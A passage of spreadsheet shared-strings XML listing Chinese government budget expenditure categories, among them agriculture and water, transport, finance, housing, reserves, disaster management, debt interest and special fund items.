    <t xml:space="preserve">      其他城乡社区支出</t>
  </si>
  <si>
    <t xml:space="preserve">  农林水支出</t>
  </si>
  <si>
    <t xml:space="preserve">    农业农村</t>
  </si>
  <si>
    <t xml:space="preserve">      农垦运行</t>
  </si>
  <si>
    <t xml:space="preserve">      科技转化与推广服务</t>
  </si>
  <si>
    <t xml:space="preserve">      病虫害控制</t>
  </si>
  <si>
    <t xml:space="preserve">      农产品质量安全</t>
  </si>
  <si>
    <t xml:space="preserve">      执法监管</t>
  </si>
  <si>
    <t xml:space="preserve">      统计监测与信息服务</t>
  </si>
  <si>
    <t xml:space="preserve">      行业业务管理</t>
  </si>
  <si>
    <t xml:space="preserve">      对外交流与合作</t>
  </si>
  <si>
    <t xml:space="preserve">      防灾救灾</t>
  </si>
  <si>
    <t xml:space="preserve">      稳定农民收入补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      农业结构调整补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      农业生产发展</t>
  </si>
  <si>
    <t xml:space="preserve">      农村合作经济</t>
  </si>
  <si>
    <t xml:space="preserve">      农产品加工与促销</t>
  </si>
  <si>
    <t xml:space="preserve">      农村社会事业</t>
  </si>
  <si>
    <t xml:space="preserve">      农业资源保护修复与利用</t>
  </si>
  <si>
    <t xml:space="preserve">      农村道路建设</t>
  </si>
  <si>
    <t xml:space="preserve">      成品油价格改革对渔业的补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      对高校毕业生到基层任职补助</t>
  </si>
  <si>
    <t xml:space="preserve">      农田建设</t>
  </si>
  <si>
    <t xml:space="preserve">      其他农业农村支出</t>
  </si>
  <si>
    <t xml:space="preserve">    林业和草原</t>
  </si>
  <si>
    <t xml:space="preserve">      事业机构</t>
  </si>
  <si>
    <t xml:space="preserve">      森林资源培育</t>
  </si>
  <si>
    <t xml:space="preserve">      技术推广与转化</t>
  </si>
  <si>
    <t xml:space="preserve">      森林资源管理</t>
  </si>
  <si>
    <t xml:space="preserve">      森林生态效益补偿</t>
  </si>
  <si>
    <t xml:space="preserve">      自然保护区等管理</t>
  </si>
  <si>
    <t xml:space="preserve">      动植物保护</t>
  </si>
  <si>
    <t xml:space="preserve">      湿地保护</t>
  </si>
  <si>
    <t xml:space="preserve">      执法与监督</t>
  </si>
  <si>
    <t xml:space="preserve">      防沙治沙</t>
  </si>
  <si>
    <t xml:space="preserve">      对外合作与交流</t>
  </si>
  <si>
    <t xml:space="preserve">      产业化管理</t>
  </si>
  <si>
    <t xml:space="preserve">      信息管理</t>
  </si>
  <si>
    <t xml:space="preserve">      林区公共支出</t>
  </si>
  <si>
    <t xml:space="preserve">      贷款贴息</t>
  </si>
  <si>
    <t xml:space="preserve">      成品油价格改革对林业的补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      林业草原防灾减灾</t>
  </si>
  <si>
    <t xml:space="preserve">      国家公园</t>
  </si>
  <si>
    <t xml:space="preserve">      草原管理</t>
  </si>
  <si>
    <t xml:space="preserve">      其他林业和草原支出</t>
  </si>
  <si>
    <t xml:space="preserve">    水利</t>
  </si>
  <si>
    <t xml:space="preserve">      水利行业业务管理</t>
  </si>
  <si>
    <t xml:space="preserve">      水利工程建设</t>
  </si>
  <si>
    <t xml:space="preserve">      水利工程运行与维护</t>
  </si>
  <si>
    <t xml:space="preserve">      长江黄河等流域管理</t>
  </si>
  <si>
    <t xml:space="preserve">      水利前期工作</t>
  </si>
  <si>
    <t xml:space="preserve">      水利执法监督</t>
  </si>
  <si>
    <t xml:space="preserve">      水土保持</t>
  </si>
  <si>
    <t xml:space="preserve">      水资源节约管理与保护</t>
  </si>
  <si>
    <t xml:space="preserve">      水质监测</t>
  </si>
  <si>
    <t xml:space="preserve">      水文测报</t>
  </si>
  <si>
    <t xml:space="preserve">      防汛</t>
  </si>
  <si>
    <t xml:space="preserve">      抗旱</t>
  </si>
  <si>
    <t xml:space="preserve">      农村水利</t>
  </si>
  <si>
    <t xml:space="preserve">      水利技术推广</t>
  </si>
  <si>
    <t xml:space="preserve">      国际河流治理与管理</t>
  </si>
  <si>
    <t xml:space="preserve">      江河湖库水系综合整治</t>
  </si>
  <si>
    <t xml:space="preserve">      大中型水库移民后期扶持专项支出</t>
  </si>
  <si>
    <t xml:space="preserve">      水利安全监督</t>
  </si>
  <si>
    <t xml:space="preserve">      水利建设征地及移民支出</t>
  </si>
  <si>
    <t xml:space="preserve">      农村人畜饮水</t>
  </si>
  <si>
    <t xml:space="preserve">      南水北调工程建设</t>
  </si>
  <si>
    <t xml:space="preserve">      南水北调工程管理</t>
  </si>
  <si>
    <t xml:space="preserve">      其他水利支出</t>
  </si>
  <si>
    <t xml:space="preserve">    扶贫</t>
  </si>
  <si>
    <t xml:space="preserve">      农村基础设施建设</t>
  </si>
  <si>
    <t xml:space="preserve">      生产发展</t>
  </si>
  <si>
    <t xml:space="preserve">      社会发展</t>
  </si>
  <si>
    <t xml:space="preserve">      扶贫贷款奖补和贴息</t>
  </si>
  <si>
    <t xml:space="preserve">      “三西”农业建设专项补助</t>
  </si>
  <si>
    <t xml:space="preserve">      扶贫事业机构</t>
  </si>
  <si>
    <t xml:space="preserve">      其他扶贫支出</t>
  </si>
  <si>
    <t xml:space="preserve">    农村综合改革</t>
  </si>
  <si>
    <t xml:space="preserve">      对村级公益事业建设的补助</t>
  </si>
  <si>
    <t xml:space="preserve">      国有农场办社会职能改革补助</t>
  </si>
  <si>
    <t xml:space="preserve">      对村民委员会和村党支部的补助</t>
  </si>
  <si>
    <t xml:space="preserve">      对村集体经济组织的补助</t>
  </si>
  <si>
    <t xml:space="preserve">      农村综合改革示范试点补助</t>
  </si>
  <si>
    <t xml:space="preserve">      其他农村综合改革支出</t>
  </si>
  <si>
    <t xml:space="preserve">    普惠金融发展支出</t>
  </si>
  <si>
    <t xml:space="preserve">      支持农村金融机构</t>
  </si>
  <si>
    <t xml:space="preserve">      涉农贷款增量奖励</t>
  </si>
  <si>
    <t xml:space="preserve">      农业保险保费补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      创业担保贷款贴息</t>
  </si>
  <si>
    <t xml:space="preserve">      补充创业担保贷款基金</t>
  </si>
  <si>
    <t xml:space="preserve">      其他普惠金融发展支出</t>
  </si>
  <si>
    <t xml:space="preserve">    目标价格补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      棉花目标价格补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      其他目标价格补贴</t>
  </si>
  <si>
    <t xml:space="preserve">    其他农林水支出</t>
  </si>
  <si>
    <t xml:space="preserve">      化解其他公益性乡村债务支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他农林水支出</t>
  </si>
  <si>
    <t xml:space="preserve">  交通运输支出</t>
  </si>
  <si>
    <t xml:space="preserve">    公路水路运输</t>
  </si>
  <si>
    <t xml:space="preserve">      公路建设</t>
  </si>
  <si>
    <t xml:space="preserve">      公路养护</t>
  </si>
  <si>
    <t xml:space="preserve">      交通运输信息化建设</t>
  </si>
  <si>
    <t xml:space="preserve">      公路和运输安全</t>
  </si>
  <si>
    <t xml:space="preserve">      公路还贷专项</t>
  </si>
  <si>
    <t xml:space="preserve">      公路运输管理</t>
  </si>
  <si>
    <t xml:space="preserve">      公路和运输技术标准化建设</t>
  </si>
  <si>
    <t xml:space="preserve">      港口设施</t>
  </si>
  <si>
    <t xml:space="preserve">      航道维护</t>
  </si>
  <si>
    <t xml:space="preserve">      船舶检验</t>
  </si>
  <si>
    <t xml:space="preserve">      救助打捞</t>
  </si>
  <si>
    <t xml:space="preserve">      内河运输</t>
  </si>
  <si>
    <t xml:space="preserve">      远洋运输</t>
  </si>
  <si>
    <t xml:space="preserve">      海事管理</t>
  </si>
  <si>
    <t xml:space="preserve">      航标事业发展支出</t>
  </si>
  <si>
    <t xml:space="preserve">      水路运输管理支出</t>
  </si>
  <si>
    <t xml:space="preserve">      口岸建设</t>
  </si>
  <si>
    <t xml:space="preserve">      取消政府还贷二级公路收费专项支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他公路水路运输支出</t>
  </si>
  <si>
    <t xml:space="preserve">    铁路运输</t>
  </si>
  <si>
    <t xml:space="preserve">      铁路路网建设</t>
  </si>
  <si>
    <t xml:space="preserve">      铁路还贷专项</t>
  </si>
  <si>
    <t xml:space="preserve">      铁路安全</t>
  </si>
  <si>
    <t xml:space="preserve">      铁路专项运输</t>
  </si>
  <si>
    <t xml:space="preserve">      行业监管</t>
  </si>
  <si>
    <t xml:space="preserve">      其他铁路运输支出</t>
  </si>
  <si>
    <t xml:space="preserve">    民用航空运输</t>
  </si>
  <si>
    <t xml:space="preserve">      机场建设</t>
  </si>
  <si>
    <t xml:space="preserve">      空管系统建设</t>
  </si>
  <si>
    <t xml:space="preserve">      民航还贷专项支出</t>
  </si>
  <si>
    <t xml:space="preserve">      民用航空安全</t>
  </si>
  <si>
    <t xml:space="preserve">      民航专项运输</t>
  </si>
  <si>
    <t xml:space="preserve">      其他民用航空运输支出</t>
  </si>
  <si>
    <t xml:space="preserve">    成品油价格改革对交通运输的补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      对城市公交的补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      对农村道路客运的补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      对出租车的补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      成品油价格改革补贴其他支出</t>
  </si>
  <si>
    <t xml:space="preserve">    邮政业支出</t>
  </si>
  <si>
    <t xml:space="preserve">      邮政普遍服务与特殊服务</t>
  </si>
  <si>
    <t xml:space="preserve">      其他邮政业支出</t>
  </si>
  <si>
    <t xml:space="preserve">    车辆购置税支出</t>
  </si>
  <si>
    <t xml:space="preserve">      车辆购置税用于公路等基础设施建设支出</t>
  </si>
  <si>
    <t xml:space="preserve">      车辆购置税用于农村公路建设支出</t>
  </si>
  <si>
    <t xml:space="preserve">      车辆购置税用于老旧汽车报废更新补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      车辆购置税其他支出</t>
  </si>
  <si>
    <t xml:space="preserve">    其他交通运输支出</t>
  </si>
  <si>
    <t xml:space="preserve">      公共交通运营补助</t>
  </si>
  <si>
    <t xml:space="preserve">      其他交通运输支出</t>
  </si>
  <si>
    <t xml:space="preserve">  资源勘探工业信息等支出</t>
  </si>
  <si>
    <t xml:space="preserve">    资源勘探开发</t>
  </si>
  <si>
    <t xml:space="preserve">      煤炭勘探开采和洗选</t>
  </si>
  <si>
    <t xml:space="preserve">      石油和天然气勘探开采</t>
  </si>
  <si>
    <t xml:space="preserve">      黑色金属矿勘探和采选</t>
  </si>
  <si>
    <t xml:space="preserve">      有色金属矿勘探和采选</t>
  </si>
  <si>
    <t xml:space="preserve">      非金属矿勘探和采选</t>
  </si>
  <si>
    <t xml:space="preserve">      其他资源勘探业支出</t>
  </si>
  <si>
    <t xml:space="preserve">    制造业</t>
  </si>
  <si>
    <t xml:space="preserve">      纺织业</t>
  </si>
  <si>
    <t xml:space="preserve">      医药制造业</t>
  </si>
  <si>
    <t xml:space="preserve">      非金属矿物制品业</t>
  </si>
  <si>
    <t xml:space="preserve">      通信设备、计算机及其他电子设备制造业</t>
  </si>
  <si>
    <t xml:space="preserve">      交通运输设备制造业</t>
  </si>
  <si>
    <t xml:space="preserve">      电气机械及器材制造业</t>
  </si>
  <si>
    <t xml:space="preserve">      工艺品及其他制造业</t>
  </si>
  <si>
    <t xml:space="preserve">      石油加工、炼焦及核燃料加工业</t>
  </si>
  <si>
    <t xml:space="preserve">      化学原料及化学制品制造业</t>
  </si>
  <si>
    <t xml:space="preserve">      黑色金属冶炼及压延加工业</t>
  </si>
  <si>
    <t xml:space="preserve">      有色金属冶炼及压延加工业</t>
  </si>
  <si>
    <t xml:space="preserve">      其他制造业支出</t>
  </si>
  <si>
    <t xml:space="preserve">    建筑业</t>
  </si>
  <si>
    <t xml:space="preserve">      其他建筑业支出</t>
  </si>
  <si>
    <t xml:space="preserve">    工业和信息产业监管</t>
  </si>
  <si>
    <t xml:space="preserve">      战备应急</t>
  </si>
  <si>
    <t xml:space="preserve">      专用通信</t>
  </si>
  <si>
    <t xml:space="preserve">      无线电及信息通信监管</t>
  </si>
  <si>
    <t xml:space="preserve">      工程建设及运行维护</t>
  </si>
  <si>
    <t xml:space="preserve">      产业发展</t>
  </si>
  <si>
    <t xml:space="preserve">      其他工业和信息产业监管支出</t>
  </si>
  <si>
    <t xml:space="preserve">    国有资产监管</t>
  </si>
  <si>
    <t xml:space="preserve">      国有企业监事会专项</t>
  </si>
  <si>
    <t xml:space="preserve">      中央企业专项管理</t>
  </si>
  <si>
    <t xml:space="preserve">      其他国有资产监管支出</t>
  </si>
  <si>
    <t xml:space="preserve">    支持中小企业发展和管理支出</t>
  </si>
  <si>
    <t xml:space="preserve">      科技型中小企业技术创新基金</t>
  </si>
  <si>
    <t xml:space="preserve">      中小企业发展专项</t>
  </si>
  <si>
    <t xml:space="preserve">      减免房租补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      其他支持中小企业发展和管理支出</t>
  </si>
  <si>
    <t xml:space="preserve">    其他资源勘探工业信息等支出</t>
  </si>
  <si>
    <t xml:space="preserve">      黄金事务</t>
  </si>
  <si>
    <t xml:space="preserve">      技术改造支出</t>
  </si>
  <si>
    <t xml:space="preserve">      中药材扶持资金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      重点产业振兴和技术改造项目贷款贴息</t>
  </si>
  <si>
    <t xml:space="preserve">      其他资源勘探工业信息等支出</t>
  </si>
  <si>
    <t xml:space="preserve">  商业服务业等支出</t>
  </si>
  <si>
    <t xml:space="preserve">    商业流通事务</t>
  </si>
  <si>
    <t xml:space="preserve">      食品流通安全补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      市场监测及信息管理</t>
  </si>
  <si>
    <t xml:space="preserve">      民贸企业补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      民贸民品贷款贴息</t>
  </si>
  <si>
    <t xml:space="preserve">      其他商业流通事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    涉外发展服务支出</t>
  </si>
  <si>
    <t xml:space="preserve">      外商投资环境建设补助资金</t>
  </si>
  <si>
    <t xml:space="preserve">      其他涉外发展服务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    其他商业服务业等支出</t>
  </si>
  <si>
    <t xml:space="preserve">      服务业基础设施建设</t>
  </si>
  <si>
    <t xml:space="preserve">      其他商业服务业等支出</t>
  </si>
  <si>
    <t xml:space="preserve">  金融支出</t>
  </si>
  <si>
    <t xml:space="preserve">    金融部门行政支出</t>
  </si>
  <si>
    <t xml:space="preserve">      安全防卫</t>
  </si>
  <si>
    <t xml:space="preserve">      金融部门其他行政支出</t>
  </si>
  <si>
    <t xml:space="preserve">    金融部门监管支出</t>
  </si>
  <si>
    <t xml:space="preserve">      货币发行</t>
  </si>
  <si>
    <t xml:space="preserve">      金融服务</t>
  </si>
  <si>
    <t xml:space="preserve">      反假币</t>
  </si>
  <si>
    <t xml:space="preserve">      重点金融机构监管</t>
  </si>
  <si>
    <t xml:space="preserve">      金融稽查与案件处理</t>
  </si>
  <si>
    <t xml:space="preserve">      金融行业电子化建设</t>
  </si>
  <si>
    <t xml:space="preserve">      从业人员资格考试</t>
  </si>
  <si>
    <t xml:space="preserve">      反洗钱</t>
  </si>
  <si>
    <t xml:space="preserve">      金融部门其他监管支出</t>
  </si>
  <si>
    <t xml:space="preserve">    金融发展支出</t>
  </si>
  <si>
    <t xml:space="preserve">      政策性银行亏损补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      利息费用补贴支出</t>
  </si>
  <si>
    <t xml:space="preserve">      补充资本金</t>
  </si>
  <si>
    <t xml:space="preserve">      风险基金补助</t>
  </si>
  <si>
    <t xml:space="preserve">      其他金融发展支出</t>
  </si>
  <si>
    <t xml:space="preserve">    金融调控支出</t>
  </si>
  <si>
    <t xml:space="preserve">      中央银行亏损补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      其他金融调控支出</t>
  </si>
  <si>
    <t xml:space="preserve">    其他金融支出</t>
  </si>
  <si>
    <t xml:space="preserve">      重点企业贷款贴息</t>
  </si>
  <si>
    <t xml:space="preserve">      其他金融支出</t>
  </si>
  <si>
    <t xml:space="preserve">  援助其他地区支出</t>
  </si>
  <si>
    <t xml:space="preserve">    一般公共服务</t>
  </si>
  <si>
    <t xml:space="preserve">    教育</t>
  </si>
  <si>
    <t xml:space="preserve">    文化体育与传媒</t>
  </si>
  <si>
    <t xml:space="preserve">    医疗卫生</t>
  </si>
  <si>
    <t xml:space="preserve">    节能环保</t>
  </si>
  <si>
    <t xml:space="preserve">    农业</t>
  </si>
  <si>
    <t xml:space="preserve">    交通运输</t>
  </si>
  <si>
    <t xml:space="preserve">    住房保障</t>
  </si>
  <si>
    <t xml:space="preserve">    其他支出</t>
  </si>
  <si>
    <t xml:space="preserve">  自然资源海洋气象等支出</t>
  </si>
  <si>
    <t xml:space="preserve">    自然资源事务</t>
  </si>
  <si>
    <t xml:space="preserve">      自然资源规划及管理</t>
  </si>
  <si>
    <t xml:space="preserve">      自然资源利用与保护</t>
  </si>
  <si>
    <t xml:space="preserve">      自然资源社会公益服务</t>
  </si>
  <si>
    <t xml:space="preserve">      自然资源行业业务管理</t>
  </si>
  <si>
    <t xml:space="preserve">      自然资源调查与确权登记</t>
  </si>
  <si>
    <t xml:space="preserve">      土地资源储备支出</t>
  </si>
  <si>
    <t xml:space="preserve">      地质矿产资源与环境调查</t>
  </si>
  <si>
    <t xml:space="preserve">      地质勘查与矿产资源管理</t>
  </si>
  <si>
    <t xml:space="preserve">      地质转产项目财政贴息</t>
  </si>
  <si>
    <t xml:space="preserve">      国外风险勘查</t>
  </si>
  <si>
    <t xml:space="preserve">      地质勘查基金(周转金)支出</t>
  </si>
  <si>
    <t xml:space="preserve">      海域与海岛管理</t>
  </si>
  <si>
    <t xml:space="preserve">      自然资源国际合作与海洋权益维护</t>
  </si>
  <si>
    <t xml:space="preserve">      自然资源卫星</t>
  </si>
  <si>
    <t xml:space="preserve">      极地考察</t>
  </si>
  <si>
    <t xml:space="preserve">      深海调查与资源开发</t>
  </si>
  <si>
    <t xml:space="preserve">      海港航标维护</t>
  </si>
  <si>
    <t xml:space="preserve">      海水淡化</t>
  </si>
  <si>
    <t xml:space="preserve">      无居民海岛使用金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      海洋战略规划与预警监测</t>
  </si>
  <si>
    <t xml:space="preserve">      基础测绘与地理信息监管</t>
  </si>
  <si>
    <t xml:space="preserve">      其他自然资源事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    气象事务</t>
  </si>
  <si>
    <t xml:space="preserve">      气象事业机构</t>
  </si>
  <si>
    <t xml:space="preserve">      气象探测</t>
  </si>
  <si>
    <t xml:space="preserve">      气象信息传输及管理</t>
  </si>
  <si>
    <t xml:space="preserve">      气象预报预测</t>
  </si>
  <si>
    <t xml:space="preserve">      气象服务</t>
  </si>
  <si>
    <t xml:space="preserve">      气象装备保障维护</t>
  </si>
  <si>
    <t xml:space="preserve">      气象基础设施建设与维修</t>
  </si>
  <si>
    <t xml:space="preserve">      气象卫星</t>
  </si>
  <si>
    <t xml:space="preserve">      气象法规与标准</t>
  </si>
  <si>
    <t xml:space="preserve">      气象资金审计稽查</t>
  </si>
  <si>
    <t xml:space="preserve">      其他气象事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    其他自然资源海洋气象等支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他自然资源海洋气象等支出</t>
  </si>
  <si>
    <t xml:space="preserve">  住房保障支出</t>
  </si>
  <si>
    <t xml:space="preserve">    保障性安居工程支出</t>
  </si>
  <si>
    <t xml:space="preserve">      廉租住房</t>
  </si>
  <si>
    <t xml:space="preserve">      沉陷区治理</t>
  </si>
  <si>
    <t xml:space="preserve">      棚户区改造</t>
  </si>
  <si>
    <t xml:space="preserve">      少数民族地区游牧民定居工程</t>
  </si>
  <si>
    <t xml:space="preserve">      农村危房改造</t>
  </si>
  <si>
    <t xml:space="preserve">      公共租赁住房</t>
  </si>
  <si>
    <t xml:space="preserve">      保障性住房租金补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      老旧小区改造</t>
  </si>
  <si>
    <t xml:space="preserve">      住房租赁市场发展</t>
  </si>
  <si>
    <t xml:space="preserve">      其他保障性安居工程支出</t>
  </si>
  <si>
    <t xml:space="preserve">    住房改革支出</t>
  </si>
  <si>
    <t xml:space="preserve">      住房公积金</t>
  </si>
  <si>
    <t xml:space="preserve">      提租补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      购房补贴</t>
  </si>
  <si>
    <t xml:space="preserve">    城乡社区住宅</t>
  </si>
  <si>
    <t xml:space="preserve">      公有住房建设和维修改造支出</t>
  </si>
  <si>
    <t xml:space="preserve">      住房公积金管理</t>
  </si>
  <si>
    <t xml:space="preserve">      其他城乡社区住宅支出</t>
  </si>
  <si>
    <t xml:space="preserve">  粮油物资储备支出</t>
  </si>
  <si>
    <t xml:space="preserve">    粮油物资事务</t>
  </si>
  <si>
    <t xml:space="preserve">      财务和审计支出</t>
  </si>
  <si>
    <t xml:space="preserve">      信息统计</t>
  </si>
  <si>
    <t xml:space="preserve">      专项业务活动</t>
  </si>
  <si>
    <t xml:space="preserve">      国家粮油差价补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      粮食财务挂账利息补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      粮食财务挂账消化款</t>
  </si>
  <si>
    <t xml:space="preserve">      处理陈化粮补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      粮食风险基金</t>
  </si>
  <si>
    <t xml:space="preserve">      粮油市场调控专项资金</t>
  </si>
  <si>
    <t xml:space="preserve">      设施建设</t>
  </si>
  <si>
    <t xml:space="preserve">      设施安全</t>
  </si>
  <si>
    <t xml:space="preserve">      物资保管保养</t>
  </si>
  <si>
    <t xml:space="preserve">      其他粮油物资事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    能源储备</t>
  </si>
  <si>
    <t xml:space="preserve">      石油储备</t>
  </si>
  <si>
    <t xml:space="preserve">      天然铀能源储备</t>
  </si>
  <si>
    <t xml:space="preserve">      煤炭储备</t>
  </si>
  <si>
    <t xml:space="preserve">      成品油储备</t>
  </si>
  <si>
    <t xml:space="preserve">      其他能源储备支出</t>
  </si>
  <si>
    <t xml:space="preserve">    粮油储备</t>
  </si>
  <si>
    <t xml:space="preserve">      储备粮油补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      储备粮油差价补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      储备粮(油)库建设</t>
  </si>
  <si>
    <t xml:space="preserve">      最低收购价政策支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他粮油储备支出</t>
  </si>
  <si>
    <t xml:space="preserve">    重要商品储备</t>
  </si>
  <si>
    <t xml:space="preserve">      棉花储备</t>
  </si>
  <si>
    <t xml:space="preserve">      食糖储备</t>
  </si>
  <si>
    <t xml:space="preserve">      肉类储备</t>
  </si>
  <si>
    <t xml:space="preserve">      化肥储备</t>
  </si>
  <si>
    <t xml:space="preserve">      农药储备</t>
  </si>
  <si>
    <t xml:space="preserve">      边销茶储备</t>
  </si>
  <si>
    <t xml:space="preserve">      羊毛储备</t>
  </si>
  <si>
    <t xml:space="preserve">      医药储备</t>
  </si>
  <si>
    <t xml:space="preserve">      食盐储备</t>
  </si>
  <si>
    <t xml:space="preserve">      战略物资储备</t>
  </si>
  <si>
    <t xml:space="preserve">      应急物资储备</t>
  </si>
  <si>
    <t xml:space="preserve">      其他重要商品储备支出</t>
  </si>
  <si>
    <t xml:space="preserve">  灾害防治及应急管理支出</t>
  </si>
  <si>
    <t xml:space="preserve">    应急管理事务</t>
  </si>
  <si>
    <t xml:space="preserve">      灾害风险防治</t>
  </si>
  <si>
    <t xml:space="preserve">      国务院安委会专项</t>
  </si>
  <si>
    <t xml:space="preserve">      安全监管</t>
  </si>
  <si>
    <t xml:space="preserve">      安全生产基础</t>
  </si>
  <si>
    <t xml:space="preserve">      应急救援</t>
  </si>
  <si>
    <t xml:space="preserve">      应急管理</t>
  </si>
  <si>
    <t xml:space="preserve">      其他应急管理支出</t>
  </si>
  <si>
    <t xml:space="preserve">    消防事务</t>
  </si>
  <si>
    <t xml:space="preserve">      消防应急救援</t>
  </si>
  <si>
    <t xml:space="preserve">      其他消防事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    森林消防事务</t>
  </si>
  <si>
    <t xml:space="preserve">      森林消防应急救援</t>
  </si>
  <si>
    <t xml:space="preserve">      其他森林消防事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    煤矿安全</t>
  </si>
  <si>
    <t xml:space="preserve">      煤矿安全监察事务</t>
  </si>
  <si>
    <t xml:space="preserve">      煤矿应急救援事务</t>
  </si>
  <si>
    <t xml:space="preserve">      其他煤矿安全支出</t>
  </si>
  <si>
    <t xml:space="preserve">    地震事务</t>
  </si>
  <si>
    <t xml:space="preserve">      地震监测</t>
  </si>
  <si>
    <t xml:space="preserve">      地震预测预报</t>
  </si>
  <si>
    <t xml:space="preserve">      地震灾害预防</t>
  </si>
  <si>
    <t xml:space="preserve">      地震应急救援</t>
  </si>
  <si>
    <t xml:space="preserve">      地震环境探察</t>
  </si>
  <si>
    <t xml:space="preserve">      防震减灾信息管理</t>
  </si>
  <si>
    <t xml:space="preserve">      防震减灾基础管理</t>
  </si>
  <si>
    <t xml:space="preserve">      地震事业机构 </t>
  </si>
  <si>
    <t xml:space="preserve">      其他地震事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    自然灾害防治</t>
  </si>
  <si>
    <t xml:space="preserve">      地质灾害防治</t>
  </si>
  <si>
    <t xml:space="preserve">      森林草原防灾减灾</t>
  </si>
  <si>
    <t xml:space="preserve">      其他自然灾害防治支出</t>
  </si>
  <si>
    <t xml:space="preserve">    自然灾害救灾及恢复重建支出</t>
  </si>
  <si>
    <t xml:space="preserve">      自然灾害救灾补助</t>
  </si>
  <si>
    <t xml:space="preserve">      自然灾害灾后重建补助</t>
  </si>
  <si>
    <t xml:space="preserve">      其他自然灾害救灾及恢复重建支出</t>
  </si>
  <si>
    <t xml:space="preserve">    其他灾害防治及应急管理支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他灾害防治及应急管理支出</t>
  </si>
  <si>
    <t xml:space="preserve">  其他支出</t>
  </si>
  <si>
    <t xml:space="preserve">  债务付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">    中央政府国内债务付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">    中央政府国外债务付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">    地方政府一般债务付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">      地方政府一般债券付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">      地方政府向外国政府借款付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">      地方政府向国际组织借款付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">      地方政府其他一般债务付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">  债务发行费用支出</t>
  </si>
  <si>
    <t xml:space="preserve">    中央政府国内债务发行费用支出</t>
  </si>
  <si>
    <t xml:space="preserve">    中央政府国外债务发行费用支出</t>
  </si>
  <si>
    <t xml:space="preserve">    地方政府一般债务发行费用支出</t>
  </si>
  <si>
    <t>政府性基金预算支出合计</t>
  </si>
  <si>
    <t xml:space="preserve">    核电站乏燃料处理处置基金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      乏燃料运输</t>
  </si>
  <si>
    <t xml:space="preserve">      乏燃料离堆贮存</t>
  </si>
  <si>
    <t xml:space="preserve">      乏燃料后处理</t>
  </si>
  <si>
    <t xml:space="preserve">      高放废物的处理处置</t>
  </si>
  <si>
    <t xml:space="preserve">      乏燃料后处理厂的建设、运行、改造和退役</t>
  </si>
  <si>
    <t xml:space="preserve">      其他乏燃料处理处置基金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      资助国产影片放映</t>
  </si>
  <si>
    <t xml:space="preserve">      资助影院建设</t>
  </si>
  <si>
    <t xml:space="preserve">      资助少数民族语电影译制</t>
  </si>
  <si>
    <t xml:space="preserve">      购买农村电影公益性放映版权服务</t>
  </si>
  <si>
    <t xml:space="preserve">      其他国家电影事业发展专项资金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      宣传促销</t>
  </si>
  <si>
    <t xml:space="preserve">      行业规划</t>
  </si>
  <si>
    <t xml:space="preserve">      旅游事业补助</t>
  </si>
  <si>
    <t xml:space="preserve">      地方旅游开发项目补助</t>
  </si>
  <si>
    <t xml:space="preserve">      其他旅游发展基金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      资助城市影院</t>
  </si>
  <si>
    <t xml:space="preserve">      其他国家电影事业发展专项资金对应专项债务收入支出</t>
  </si>
  <si>
    <t xml:space="preserve">    大中型水库移民后期扶持基金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      移民补助</t>
  </si>
  <si>
    <t xml:space="preserve">      基础设施建设和经济发展</t>
  </si>
  <si>
    <t xml:space="preserve">      其他大中型水库移民后期扶持基金支出</t>
  </si>
  <si>
    <t xml:space="preserve">    小型水库移民扶助基金安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他小型水库移民扶助基金支出</t>
  </si>
  <si>
    <t xml:space="preserve">    小型水库移民扶助基金对应专项债务收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他小型水库移民扶助基金对应专项债务收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">      风力发电补助</t>
  </si>
  <si>
    <t xml:space="preserve">      太阳能发电补助</t>
  </si>
  <si>
    <t xml:space="preserve">      生物质能发电补助</t>
  </si>
